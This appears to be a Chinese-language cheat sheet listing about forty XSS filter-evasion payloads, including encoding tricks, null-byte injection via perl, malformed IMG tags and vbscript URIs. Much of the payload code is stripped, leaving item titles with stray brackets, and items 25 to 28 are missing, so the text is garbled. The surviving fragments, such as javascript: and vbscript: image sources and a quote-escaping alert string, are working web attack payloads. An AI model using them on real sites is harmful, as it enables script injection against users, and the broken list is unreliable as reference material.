# XSS payload
总结了常用的XSS payload
1.普通的XSS JavaScript注入
2.IMG标签XSS使用JavaScript命令
3.IMG标签无分号无引号
)
4.IMG标签大小写不敏感
)
5.HTML编码(必须有分号)
![](javascript:alert("XSS"))
6.修正缺陷IMG标签
![]()
">
7.formCharCode标签(计算器)
))
8.UTF-8的Unicode编码(计算器)
)
9.7位的UTF-8的Unicode编码是没有分号的(计算器)
10.十六进制编码也是没有分号(计算器)
)
11.嵌入式标签,将Javascript分开
;)
12.嵌入式编码标签,将Javascript分开
13.嵌入式换行符
14.嵌入式回车
15.嵌入式多行注入JavaScript,这是XSS极端的例子
16.解决限制字符(要求同页面)
17.空字符
perl -e 'print "![](java\0script:alert(\"XSS\"))
";' > out
18.空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e 'print "alert(\"XSS\")";' > out
19.Spaces和meta前的IMG标签
;)
20.Non-alpha-non-digit XSS
21.Non-alpha-non-digit XSS to 2
22.Non-alpha-non-digit XSS to 3
23.双开括号
<
24.无结束脚本标记(仅火狐等浏览器)
29.换码过滤的JavaScript
\";alert('XSS');//
30.结束Title标签
31.Input Image
32.BODY Image
33.BODY标签
34.IMG Dynsrc
![]()
35.IMG Lowsrc
![]()
36.BGSOUND
37.STYLE sheet
38.远程样式表
39.List-style-image(列表式)
- XSS
40.IMG VBscript
![](vbscript:msgbox("XSS"))